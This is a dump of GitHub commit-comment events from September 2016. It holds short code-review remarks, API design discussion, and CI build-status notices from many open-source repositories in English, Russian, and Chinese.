{"id":"4566709046","type":"CommitCommentEvent","actor":{"login":"aliammar7"},"repo":{"name":"dinosaadeh/Barjis"},"payload":{"comment":{"id":19032181,"position":7,"line":124,"path":"core/src/com/smb215team/barjis/game/objects/Pawn.java","commit_id":"d24422ba9750b447fba67a2ac59b35acc275a5b7","created_at":"2016-09-15T08:21:25Z","updated_at":"2016-09-15T08:21:25Z","body":"yes i've delete it please see next commit\r\n"}},"created_at":"2016-09-15T08:21:25Z"}
{"id":"4566710167","type":"CommitCommentEvent","actor":{"login":"rmacklin"},"repo":{"name":"AppFolioOnboarding/base"},"payload":{"comment":{"id":19032185,"position":18,"line":17,"path":"test/page_objects/images/index_page.rb","commit_id":"4f1e67ad41ba3a8e87f76fad321a4bd017b4f383","created_at":"2016-09-15T08:21:41Z","updated_at":"2016-09-15T08:21:41Z","body":"Rename to `showing_image?` to appease rubocop"}},"created_at":"2016-09-15T08:21:41Z"}
{"id":"4566712141","type":"CommitCommentEvent","actor":{"login":"erikd"},"repo":{"name":"erikd/libsndfile"},"payload":{"comment":{"id":19032191,"position":null,"line":null,"path":null,"commit_id":"a603d70bb8fe013f2ee67dbea594ca6a8c3ddf69","created_at":"2016-09-15T08:22:12Z","updated_at":"2016-09-15T08:22:12Z","body":"I think it happens regardless of static vs dynamic linking. Would you be able to fix this? I'm crazy busy the next couple of days.\r\n"}},"created_at":"2016-09-15T08:22:12Z"}
{"id":"4566712401","type":"CommitCommentEvent","actor":{"login":"christianwach"},"repo":{"name":"indieweb/wordpress-indieweb"},"payload":{"comment":{"id":19032193,"position":7,"line":5,"path":"includes/getting-started.php","commit_id":"fd384d3d07dd7d8f2a2525b9e01d31aeb352dc98","created_at":"2016-09-15T08:22:16Z","updated_at":"2016-09-15T08:22:16Z","body":"Though I'll admit I like the toughest possible stance on security!"}},"created_at":"2016-09-15T08:22:16Z"}
{"id":"4566713333","type":"CommitCommentEvent","actor":{"login":"AnkitaGupta26"},"repo":{"name":"AnkitaGupta26/FirstTest"},"payload":{"comment":{"id":19032197,"position":null,"line":null,"path":null,"commit_id":"ccee4eb47c33e4760bcfcc380cbfdf2580c469a0","created_at":"2016-09-15T08:22:30Z","updated_at":"2016-09-15T08:22:30Z","body":"the new version v0.1"}},"created_at":"2016-09-15T08:22:30Z"}
{"id":"4566714977","type":"CommitCommentEvent","actor":{"login":"awwright"},"repo":{"name":"json-schema-org/json-schema-spec"},"payload":{"comment":{"id":19032202,"position":79,"line":124,"path":"jsonschema-schema.xml","commit_id":"11a0063243c2941d9fe9ed6ca0998157bbdd4d2a","created_at":"2016-09-15T08:22:55Z","updated_at":"2016-09-15T08:22:55Z","body":"lol, thanks for reviewing this!"}},"created_at":"2016-09-15T08:22:55Z"}
{"id":"4566716630","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19032209,"position":null,"line":null,"path":null,"commit_id":"cbce352cdc45e56000eba299168b54ae1c95ea0e","created_at":"2016-09-15T08:23:22Z","updated_at":"2016-09-15T08:23:22Z","body":"os_2_0_develop_linux (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-cbce352cdc45e56000eba299168b54ae1c95ea0e-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-cbce352cdc45e56000eba299168b54ae1c95ea0e-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T08:23:22Z"}
{"id":"4566718800","type":"CommitCommentEvent","actor":{"login":"otbrown"},"repo":{"name":"otbrown/mpostat-matlab"},"payload":{"comment":{"id":19032218,"position":null,"line":null,"path":null,"commit_id":"67d00405dbee19bd526fcc482f11e2f89f98660a","created_at":"2016-09-15T08:23:54Z","updated_at":"2016-09-15T08:23:54Z","body":"Merged from dev. Validated against FourSiteExact."}},"created_at":"2016-09-15T08:23:54Z"}
{"id":"4566719562","type":"CommitCommentEvent","actor":{"login":"nagolo"},"repo":{"name":"nagolo/-taking-"},"payload":{"comment":{"id":19032221,"position":1,"line":1,"path":"README.md","commit_id":"bc53b7a5f2b0a817b3a3cf04bdd881a38b46ad30","created_at":"2016-09-15T08:24:08Z","updated_at":"2016-09-15T08:24:08Z","body":"Пиздец "}},"created_at":"2016-09-15T08:24:08Z"}
{"id":"4566720121","type":"CommitCommentEvent","actor":{"login":"sns-seb"},"repo":{"name":"SonarSource/sonarqube"},"payload":{"comment":{"id":19032222,"position":31,"line":58,"path":"server/sonar-web/src/main/webapp/WEB-INF/app/models/property.rb","commit_id":"77bd719aedd53e98d72ea00a656773fe7e0a4e48","created_at":"2016-09-15T08:24:16Z","updated_at":"2016-09-15T08:24:16Z","body":"what would be the value? it works"}},"created_at":"2016-09-15T08:24:16Z"}
{"id":"4566720259","type":"CommitCommentEvent","actor":{"login":"clyfe"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19032223,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-15T08:24:18Z","updated_at":"2016-09-15T08:24:18Z","body":"I don't have time to implement this now, sorry :("}},"created_at":"2016-09-15T08:24:18Z"}
{"id":"4566722845","type":"CommitCommentEvent","actor":{"login":"Wetxius"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":19032228,"position":null,"line":null,"path":null,"commit_id":"64d282b8e87b88430c605f60b335aad27bcdeb47","created_at":"2016-09-15T08:24:59Z","updated_at":"2016-09-15T08:24:59Z","body":"Там пандарии ещё остались дебаффы так-то) Их ещё никто не удалял."}},"created_at":"2016-09-15T08:24:59Z"}
{"id":"4566727583","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19032237,"position":null,"line":null,"path":null,"commit_id":"86bad0fe134e6b427e8c04dce5edf48f3556e73a","created_at":"2016-09-15T08:26:07Z","updated_at":"2016-09-15T08:26:07Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 25](http://munit-050:8112/tc/viewLog.html?buildId=99035&buildTypeId=BranchesTests_GitYaegorSandbox) is now running\n"}},"created_at":"2016-09-15T08:26:07Z"}
{"id":"4566729760","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":19032247,"position":218,"line":758,"path":"lib/elixir/lib/calendar.ex","commit_id":"e50735ff2a7c16cc7705d8fa59af906e986c19f7","created_at":"2016-09-15T08:26:39Z","updated_at":"2016-09-15T08:26:39Z","body":"> Of course a similar \"promote naive to datetime\" function could also exist for non-UTC time zones if we had tzdata. Taking a timezone name as an argument.\r\n\r\nI added `DateTime.from_naive/2` that expects the datetime and the timezone. The timezone must be \"Etc/UTC\" but we have the option to make it general later on once we support tzdata. I have also removed `NaiveDateTime.to_unix/1`.\r\n\r\n> Regarding gregorian seconds since they are an Erlang thing that is not UTC specific.\r\n\r\nOh, I did not know that!\r\n\r\nLet me be a bit more specific about my problem than the solution. I would like to convert this module to only use functions in the Elixir's Calendar module: https://github.com/elixir-ecto/ecto/blob/master/lib/ecto/adapters/postgres/datetime.ex\r\n\r\nTo implement such, we would need:\r\n\r\n  1. To get the amount of seconds in a given time\r\n  2. To get the amount of days in a given date\r\n  3. To get the amount of seconds in a naive datetime\r\n  4. To get the amount of seconds in a datetime\r\n\r\nAll of those without considering leap seconds. Now that I have removed `NaiveDateTime.to_unix/1`, it means there is no way of doing 3 without resorting to `:calendar` (requires knowing Erlang) or converting to `DateTime` (unnecessary work). I would love to solve all bullets above but I am having a hard time coming up for an API. I thought we could use `to_unix` at least for 3 and 4 but you have valid reasons for not doing that.\r\n\r\nOne option is to add the following functions: `Date.to_days`, `Time.to_integer(precision \\\\ :seconds)`, `NaiveDateTime.date_to_days` and `NaiveDateTime.time_to_integer(precision \\\\ :seconds)`. Because, by having the last 2, at least I can do `days * 86400 + time` to get the overall datetime in seconds. Thoughts?"}},"created_at":"2016-09-15T08:26:39Z"}
{"id":"4566730155","type":"CommitCommentEvent","actor":{"login":"Wetxius"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":19032249,"position":null,"line":null,"path":null,"commit_id":"64d282b8e87b88430c605f60b335aad27bcdeb47","created_at":"2016-09-15T08:26:44Z","updated_at":"2016-09-15T08:26:44Z","body":"Бывают же по ачивкам ходят в старые рейды, и некоторые дебаффы уже не заабузишь хай гиром. По крайней мере, раньше такое было)"}},"created_at":"2016-09-15T08:26:44Z"}
{"id":"4566732468","type":"CommitCommentEvent","actor":{"login":"tar-viturawong-sociomantic"},"repo":{"name":"damian-rodriguez-sociomantic/flounder"},"payload":{"comment":{"id":19032253,"position":15,"line":25,"path":"src/core/flounder.js","commit_id":"7365bdb1f827e80791e3d2ece5e92d842b14fdef","created_at":"2016-09-15T08:27:17Z","updated_at":"2016-09-15T08:27:17Z","body":"I remember this being a temporary solution to `Milestone-BudgetUpdate3` and that it would be fully fixed right after. I guess we should do this in PKW @damian-rodriguez-sociomantic? "}},"created_at":"2016-09-15T08:27:17Z"}
{"id":"4566734423","type":"CommitCommentEvent","actor":{"login":"zhenxiaoyang"},"repo":{"name":"coldfreeboy/djangoweixin"},"payload":{"comment":{"id":19032255,"position":null,"line":null,"path":null,"commit_id":"8fd724d87cef7104a48123ea47a82bfced0887b7","created_at":"2016-09-15T08:27:44Z","updated_at":"2016-09-15T08:27:44Z","body":"不错！"}},"created_at":"2016-09-15T08:27:44Z"}
{"id":"4566735586","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19032260,"position":67,"line":188,"path":"resources/qml/Preferences/MachinesPage.qml","commit_id":"0693c0284b4fe074a118649dd0ec3993221650ea","created_at":"2016-09-15T08:28:02Z","updated_at":"2016-09-15T08:28:02Z","body":"Yes, I figured that out and removed the comment in a later commit"}},"created_at":"2016-09-15T08:28:02Z"}
{"id":"4566737393","type":"CommitCommentEvent","actor":{"login":"Warrior-"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":19032263,"position":null,"line":null,"path":null,"commit_id":"64d282b8e87b88430c605f60b335aad27bcdeb47","created_at":"2016-09-15T08:28:29Z","updated_at":"2016-09-15T08:28:29Z","body":"Вот поэтому и говорю что не надо их трогать)"}},"created_at":"2016-09-15T08:28:29Z"}
{"id":"4566737684","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19032264,"position":6,"line":123,"path":"plugins/VersionUpgrade/VersionUpgrade21to22/VersionUpgrade21to22.py","commit_id":"5c5d1888894d541eb8ff8c092daf5bf1170ff7fd","created_at":"2016-09-15T08:28:34Z","updated_at":"2016-09-15T08:28:34Z","body":"I think to remember it was removed because it shared a lot of code with the old wall overlap compensation code, which was rewritten."}},"created_at":"2016-09-15T08:28:34Z"}
{"id":"4566737979","type":"CommitCommentEvent","actor":{"login":"xalopp"},"repo":{"name":"Microsoft/msphpsql"},"payload":{"comment":{"id":19032266,"position":5,"line":47,"path":"source/pdo_sqlsrv/config.m4","commit_id":"4ccffbbe077e87288bf00cc6327142579da46775","created_at":"2016-09-15T08:28:37Z","updated_at":"2016-09-15T08:28:37Z","body":"Actually I really meant `-I$pdo_cv_inc_path -std=c++11` as 5th parameter.\r\n\r\nI'll need to check if\r\n```\r\nPHP_NEW_EXTENSION(pdo_sqlsrv, $sources, $ext_shared,,-I$pdo_cv_inc_path -std=c++11, cxx)\r\n```\r\nis also correct."}},"created_at":"2016-09-15T08:28:37Z"}
{"id":"4566742021","type":"CommitCommentEvent","actor":{"login":"claudiosmweb"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":19032274,"position":null,"line":null,"path":null,"commit_id":"486449bf07a347e3df339d2ad1cd501b38c2eeda","created_at":"2016-09-15T08:29:34Z","updated_at":"2016-09-15T08:29:34Z","body":"@shivapoudel check it https://getcomposer.org/doc/01-basic-usage.md#composer-lock-the-lock-file\r\n\r\nThe important is:\r\n\r\n> Commit your application's composer.lock (along with composer.json) into version control.\r\n> This means that anyone who sets up the project will download the exact same version of the dependencies"}},"created_at":"2016-09-15T08:29:34Z"}
{"id":"4566742460","type":"CommitCommentEvent","actor":{"login":"cyrilhamidechi"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19032277,"position":5,"line":59,"path":"modules/@angular/http/src/headers.ts","commit_id":"7f647822bdddaad6a96c4f368a9874ce7ae3775c","created_at":"2016-09-15T08:29:39Z","updated_at":"2016-09-15T08:29:39Z","body":"Thank you for your answer @vicb .\r\nIssue has been opened here https://github.com/angular/angular/issues/11624"}},"created_at":"2016-09-15T08:29:39Z"}
{"id":"4566744072","type":"CommitCommentEvent","actor":{"login":"mljjlm"},"repo":{"name":"AnalogIO/Analog-Tamigo-API"},"payload":{"comment":{"id":19032282,"position":null,"line":null,"path":null,"commit_id":"1b97363a0f1e7429118f0bb1ff662d5c6b819cf8","created_at":"2016-09-15T08:30:05Z","updated_at":"2016-09-15T08:30:05Z","body":"I think Web API uses some ISO standard rather than Unix time. At least it's readable for human beings. "}},"created_at":"2016-09-15T08:30:05Z"}
{"id":"4566744193","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19032283,"position":null,"line":null,"path":null,"commit_id":"cbce352cdc45e56000eba299168b54ae1c95ea0e","created_at":"2016-09-15T08:30:07Z","updated_at":"2016-09-15T08:30:07Z","body":"os_2_0_develop_linux (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-cbce352cdc45e56000eba299168b54ae1c95ea0e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-15T08:30:07Z"}
{"id":"4566744862","type":"CommitCommentEvent","actor":{"login":"xalopp"},"repo":{"name":"Microsoft/msphpsql"},"payload":{"comment":{"id":19032285,"position":4,"line":183,"path":"source/pdo_sqlsrv/pdo_sqlsrv.h","commit_id":"4ccffbbe077e87288bf00cc6327142579da46775","created_at":"2016-09-15T08:30:17Z","updated_at":"2016-09-15T08:30:17Z","body":"I think the indentation should be 4 spaces here, to have a more consistent coding style."}},"created_at":"2016-09-15T08:30:17Z"}
{"id":"4566746089","type":"CommitCommentEvent","actor":{"login":"aardgoose"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":19032286,"position":null,"line":null,"path":null,"commit_id":"fd4c58dcbe4f06e8ec4c5771f4742220d83103e3","created_at":"2016-09-15T08:30:32Z","updated_at":"2016-09-15T08:30:32Z","body":"Ah I missed that, thanks,"}},"created_at":"2016-09-15T08:30:32Z"}
{"id":"4566746478","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"robcore/machinex"},"payload":{"comment":{"id":19032287,"position":null,"line":null,"path":null,"commit_id":"5989da3d46dab497a2ec03ef6c9c42dc25f0b612","created_at":"2016-09-15T08:30:38Z","updated_at":"2016-09-15T08:30:38Z","body":"Haha oh man, though I suck at git (please teach me how to cherry pick??), I have to postulate that commit messages are the ultimate therapeutic release of curse words in existence.  THIS is how I remain patient and polite in real life : )"}},"created_at":"2016-09-15T08:30:38Z"}
{"id":"4566748526","type":"CommitCommentEvent","actor":{"login":"xalopp"},"repo":{"name":"Microsoft/msphpsql"},"payload":{"comment":{"id":19032293,"position":10,"line":1093,"path":"source/pdo_sqlsrv/pdo_stmt.cpp","commit_id":"4ccffbbe077e87288bf00cc6327142579da46775","created_at":"2016-09-15T08:31:06Z","updated_at":"2016-09-15T08:31:06Z","body":"I think the indentation should be 16 spaces here, to have a more consistent coding style.\r\n"}},"created_at":"2016-09-15T08:31:06Z"}
{"id":"4566751013","type":"CommitCommentEvent","actor":{"login":"xalopp"},"repo":{"name":"Microsoft/msphpsql"},"payload":{"comment":{"id":19032303,"position":11,"line":23,"path":"source/pdo_sqlsrv/version.h","commit_id":"4ccffbbe077e87288bf00cc6327142579da46775","created_at":"2016-09-15T08:31:41Z","updated_at":"2016-09-15T08:31:41Z","body":"Shouldn't it be `4`?"}},"created_at":"2016-09-15T08:31:41Z"}
{"id":"4566752549","type":"CommitCommentEvent","actor":{"login":"xalopp"},"repo":{"name":"Microsoft/msphpsql"},"payload":{"comment":{"id":19032308,"position":7,"line":20,"path":"source/pdo_sqlsrv/version.h","commit_id":"4ccffbbe077e87288bf00cc6327142579da46775","created_at":"2016-09-15T08:32:04Z","updated_at":"2016-09-15T08:32:04Z","body":"Shouldn't it be `4.0.4.0`?"}},"created_at":"2016-09-15T08:32:04Z"}
{"id":"4566756656","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19032317,"position":null,"line":null,"path":null,"commit_id":"35d1877dd4734173f45cf66ad29643ae86731fb5","created_at":"2016-09-15T08:33:03Z","updated_at":"2016-09-15T08:33:03Z","body":"Initial commit"}},"created_at":"2016-09-15T08:33:03Z"}
{"id":"4566757545","type":"CommitCommentEvent","actor":{"login":"xalopp"},"repo":{"name":"Microsoft/msphpsql"},"payload":{"comment":{"id":19032320,"position":5,"line":1957,"path":"source/sqlsrv/core_stmt.cpp","commit_id":"4ccffbbe077e87288bf00cc6327142579da46775","created_at":"2016-09-15T08:33:16Z","updated_at":"2016-09-15T08:33:16Z","body":"I think the indentation should be 12 spaces here, to have a more consistent coding style.\r\n"}},"created_at":"2016-09-15T08:33:16Z"}
{"id":"4566757734","type":"CommitCommentEvent","actor":{"login":"wild-north"},"repo":{"name":"shoot56/lesson8"},"payload":{"comment":{"id":19032321,"position":1,"line":1,"path":"js/main.js","commit_id":"a2e63cccd492a23855e42abbe0138d7abf8571df","created_at":"2016-09-15T08:33:18Z","updated_at":"2016-09-15T08:33:18Z","body":"👍 "}},"created_at":"2016-09-15T08:33:18Z"}
{"id":"4566758376","type":"CommitCommentEvent","actor":{"login":"Murmur"},"repo":{"name":"sheabunge/GitPortable"},"payload":{"comment":{"id":19032324,"position":null,"line":null,"path":null,"commit_id":"d8bdb20c095cb0ea14574c222604bc7bb988e860","created_at":"2016-09-15T08:33:24Z","updated_at":"2016-09-15T08:33:24Z","body":"Should https://github.com/sheabunge/GitPortable/releases/download/v2.9.3-devtest.1/GitPortable_2.9.3_Development_Test_1.paf.exe  link work already? GitPortable homepage does not link to v2.9.3 release either."}},"created_at":"2016-09-15T08:33:24Z"}
{"id":"4566759287","type":"CommitCommentEvent","actor":{"login":"xalopp"},"repo":{"name":"Microsoft/msphpsql"},"payload":{"comment":{"id":19032326,"position":13,"line":400,"path":"source/sqlsrv/init.cpp","commit_id":"4ccffbbe077e87288bf00cc6327142579da46775","created_at":"2016-09-15T08:33:36Z","updated_at":"2016-09-15T08:33:36Z","body":"I think the indentation should be 8 spaces here, to have a more consistent coding style.\r\n"}},"created_at":"2016-09-15T08:33:36Z"}
{"id":"4566761035","type":"CommitCommentEvent","actor":{"login":"wild-north"},"repo":{"name":"shoot56/lesson8"},"payload":{"comment":{"id":19032330,"position":13,"line":13,"path":"js/main.js","commit_id":"a2e63cccd492a23855e42abbe0138d7abf8571df","created_at":"2016-09-15T08:33:57Z","updated_at":"2016-09-15T08:33:57Z","body":"избыточно, зачем лишняя ссылка на боди?"}},"created_at":"2016-09-15T08:33:57Z"}
{"id":"4566763634","type":"CommitCommentEvent","actor":{"login":"damian-rodriguez-sociomantic"},"repo":{"name":"damian-rodriguez-sociomantic/flounder"},"payload":{"comment":{"id":19032338,"position":15,"line":25,"path":"src/core/flounder.js","commit_id":"7365bdb1f827e80791e3d2ece5e92d842b14fdef","created_at":"2016-09-15T08:34:35Z","updated_at":"2016-09-15T08:34:35Z","body":"yeah, that's right @Tar, we can fix this for PKW"}},"created_at":"2016-09-15T08:34:35Z"}
{"id":"4566764424","type":"CommitCommentEvent","actor":{"login":"mikiones"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19032340,"position":null,"line":null,"path":null,"commit_id":"8e0bb60f371489e6792d0cc5a2949cf825a8eb05","created_at":"2016-09-15T08:34:47Z","updated_at":"2016-09-15T08:34:47Z","body":"do it once we got no path from creep for few times "}},"created_at":"2016-09-15T08:34:47Z"}
{"id":"4566765369","type":"CommitCommentEvent","actor":{"login":"wild-north"},"repo":{"name":"shoot56/lesson8"},"payload":{"comment":{"id":19032345,"position":20,"line":20,"path":"js/main.js","commit_id":"a2e63cccd492a23855e42abbe0138d7abf8571df","created_at":"2016-09-15T08:35:00Z","updated_at":"2016-09-15T08:35:00Z","body":"процесс клонирования всегда более трудоемкий для браузера, по-моему просто создать элемент было бы дешевле"}},"created_at":"2016-09-15T08:35:00Z"}
{"id":"4566766658","type":"CommitCommentEvent","actor":{"login":"shivapoudel"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":19032348,"position":null,"line":null,"path":null,"commit_id":"486449bf07a347e3df339d2ad1cd501b38c2eeda","created_at":"2016-09-15T08:35:18Z","updated_at":"2016-09-15T08:35:18Z","body":"@claudiosmweb Thanks for the yummy explanation :)"}},"created_at":"2016-09-15T08:35:18Z"}
{"id":"4566770269","type":"CommitCommentEvent","actor":{"login":"wild-north"},"repo":{"name":"shoot56/lesson8"},"payload":{"comment":{"id":19032356,"position":22,"line":22,"path":"js/main.js","commit_id":"a2e63cccd492a23855e42abbe0138d7abf8571df","created_at":"2016-09-15T08:36:09Z","updated_at":"2016-09-15T08:36:09Z","body":"можно просто navLinkElement.href = '#';"}},"created_at":"2016-09-15T08:36:09Z"}
{"id":"4566770370","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19032357,"position":null,"line":null,"path":null,"commit_id":"86bad0fe134e6b427e8c04dce5edf48f3556e73a","created_at":"2016-09-15T08:36:10Z","updated_at":"2016-09-15T08:36:10Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 25](http://munit-050:8112/tc/viewLog.html?buildId=99035&buildTypeId=BranchesTests_GitYaegorSandbox) outcome was **SUCCESS**\nSummary: Running Build time: 0:10:1"}},"created_at":"2016-09-15T08:36:10Z"}
{"id":"4566770527","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19032358,"position":null,"line":null,"path":null,"commit_id":"31a3c2ff74769e43501e48d244eae014d6a49821","created_at":"2016-09-15T08:36:13Z","updated_at":"2016-09-15T08:36:13Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 26](http://munit-050:8112/tc/viewLog.html?buildId=99037&buildTypeId=BranchesTests_GitYaegorSandbox) is now running\n"}},"created_at":"2016-09-15T08:36:13Z"}
{"id":"4566770641","type":"CommitCommentEvent","actor":{"login":"shoot56"},"repo":{"name":"shoot56/lesson8"},"payload":{"comment":{"id":19032359,"position":20,"line":20,"path":"js/main.js","commit_id":"a2e63cccd492a23855e42abbe0138d7abf8571df","created_at":"2016-09-15T08:36:14Z","updated_at":"2016-09-15T08:36:14Z","body":"создавать нужно в цикле?"}},"created_at":"2016-09-15T08:36:14Z"}
{"id":"4566772814","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19032362,"position":9,"line":249,"path":"resources/qml/Preferences/MaterialsPage.qml","commit_id":"e12acb81100874e974445fbeb9740d9f6783397c","created_at":"2016-09-15T08:36:42Z","updated_at":"2016-09-15T08:36:42Z","body":"I copied the logic from other bits of code. I'm not a 100% sure it happens."}},"created_at":"2016-09-15T08:36:42Z"}
{"id":"4566772979","type":"CommitCommentEvent","actor":{"login":"AmyBSOD"},"repo":{"name":"SLASHEM-Extended/SLASHEM-Extended"},"payload":{"comment":{"id":19032363,"position":null,"line":null,"path":null,"commit_id":"03281c880f80e777e093eaa840b06f7f252ec276","created_at":"2016-09-15T08:36:44Z","updated_at":"2016-09-15T08:36:44Z","body":"In sporkhack it targetted a random piece of armor that you had equipped... :P"}},"created_at":"2016-09-15T08:36:44Z"}
{"id":"4566774392","type":"CommitCommentEvent","actor":{"login":"wild-north"},"repo":{"name":"shoot56/lesson8"},"payload":{"comment":{"id":19032366,"position":14,"line":14,"path":"js/main.js","commit_id":"a2e63cccd492a23855e42abbe0138d7abf8571df","created_at":"2016-09-15T08:37:02Z","updated_at":"2016-09-15T08:37:02Z","body":"body.appendChild(nav) было бы круто делать в самом конце, но м про это еще поговорим на занятии"}},"created_at":"2016-09-15T08:37:02Z"}
{"id":"4566774397","type":"CommitCommentEvent","actor":{"login":"shoot56"},"repo":{"name":"shoot56/lesson8"},"payload":{"comment":{"id":19032367,"position":13,"line":13,"path":"js/main.js","commit_id":"a2e63cccd492a23855e42abbe0138d7abf8571df","created_at":"2016-09-15T08:37:03Z","updated_at":"2016-09-15T08:37:03Z","body":"document.body.appendChild(nav); помоему так не срабатывало"}},"created_at":"2016-09-15T08:37:03Z"}
{"id":"4566776165","type":"CommitCommentEvent","actor":{"login":"shivapoudel"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":19032371,"position":13,"line":18,"path":"composer.json","commit_id":"486449bf07a347e3df339d2ad1cd501b38c2eeda","created_at":"2016-09-15T08:37:28Z","updated_at":"2016-09-15T08:37:28Z","body":"@claudiosmweb Hard life of Windows User :p\r\n\r\n```json\r\n\"bash ./vendor/bin/phpcs --config-set installed_paths vendor/wp-coding-standards/wpcs vendor/wimg/php-compatibility\"\r\n```"}},"created_at":"2016-09-15T08:37:28Z"}
{"id":"4566779415","type":"CommitCommentEvent","actor":{"login":"jhobz"},"repo":{"name":"glacials/splits-io"},"payload":{"comment":{"id":19032378,"position":null,"line":null,"path":null,"commit_id":"b514e052e68333070918be9e60701dceb824d862","created_at":"2016-09-15T08:38:14Z","updated_at":"2016-09-15T08:38:14Z","body":"Has this been deployed yet by chance?"}},"created_at":"2016-09-15T08:38:14Z"}
{"id":"4566780607","type":"CommitCommentEvent","actor":{"login":"namin"},"repo":{"name":"TiarkRompf/minidot"},"payload":{"comment":{"id":19032383,"position":61,"line":622,"path":"dev2015/fsub5.v","commit_id":"9a9db366cf74f95e907b518adc635acca1c8e5a5","created_at":"2016-09-15T08:38:32Z","updated_at":"2016-09-15T08:38:32Z","body":"Doesn't matter much, but here, for the variable lookup, you're returning an exception instead of a stuck if lookup fails. In the cleaned version, I peel it off."}},"created_at":"2016-09-15T08:38:32Z"}
{"id":"4566781611","type":"CommitCommentEvent","actor":{"login":"andela-rekemezie"},"repo":{"name":"aezumezu/string-classes"},"payload":{"comment":{"id":19032386,"position":22,"line":22,"path":"src/string-classes.js","commit_id":"e71bb06eba4e31c2de92839dd30d6901188b1a02","created_at":"2016-09-15T08:38:46Z","updated_at":"2016-09-15T08:38:46Z","body":"**Code Quality**\r\nUnnecessary whitespace space."}},"created_at":"2016-09-15T08:38:46Z"}
{"id":"4566783946","type":"CommitCommentEvent","actor":{"login":"cholewa1992"},"repo":{"name":"AnalogIO/Analog-Tamigo-API"},"payload":{"comment":{"id":19032392,"position":null,"line":null,"path":null,"commit_id":"1b97363a0f1e7429118f0bb1ff662d5c6b819cf8","created_at":"2016-09-15T08:39:20Z","updated_at":"2016-09-15T08:39:20Z","body":"Can you please give a heads up before changing the API? Because if you change it then I probably need to change adhere to it in the iOS app."}},"created_at":"2016-09-15T08:39:20Z"}
{"id":"4566787648","type":"CommitCommentEvent","actor":{"login":"liaoguiqiu"},"repo":{"name":"liaoguiqiu/CppPrimer"},"payload":{"comment":{"id":19032398,"position":null,"line":null,"path":null,"commit_id":"834c2a2dac782af720bc09c4fabcf922a8e98279","created_at":"2016-09-15T08:40:15Z","updated_at":"2016-09-15T08:40:15Z","body":"包含的头文件斌没有Sale_data.h,应该是ex2_42.h"}},"created_at":"2016-09-15T08:40:15Z"}
{"id":"4566788330","type":"CommitCommentEvent","actor":{"login":"mljjlm"},"repo":{"name":"AnalogIO/Analog-Tamigo-API"},"payload":{"comment":{"id":19032399,"position":null,"line":null,"path":null,"commit_id":"1b97363a0f1e7429118f0bb1ff662d5c6b819cf8","created_at":"2016-09-15T08:40:24Z","updated_at":"2016-09-15T08:40:24Z","body":"The current API has not changed yet. We will tell you before it is. "}},"created_at":"2016-09-15T08:40:24Z"}
{"id":"4566789316","type":"CommitCommentEvent","actor":{"login":"erikhuizinga"},"repo":{"name":"jekyll/jekyll"},"payload":{"comment":{"id":19032402,"position":10,"line":72,"path":"site/docs/installation.md","commit_id":"3ca2cb0119608a2f31c5561917c9de4c4ab4d663","created_at":"2016-09-15T08:40:37Z","updated_at":"2016-09-15T08:40:37Z","body":"I think this should be ‘further’ instead of ‘farther’."}},"created_at":"2016-09-15T08:40:37Z"}
{"id":"4566791245","type":"CommitCommentEvent","actor":{"login":"glacials"},"repo":{"name":"glacials/splits-io"},"payload":{"comment":{"id":19032404,"position":null,"line":null,"path":null,"commit_id":"b514e052e68333070918be9e60701dceb824d862","created_at":"2016-09-15T08:41:07Z","updated_at":"2016-09-15T08:41:07Z","body":"Deployed yeah, but it's gated behind a disabled feature that I'm still mulling over."}},"created_at":"2016-09-15T08:41:07Z"}
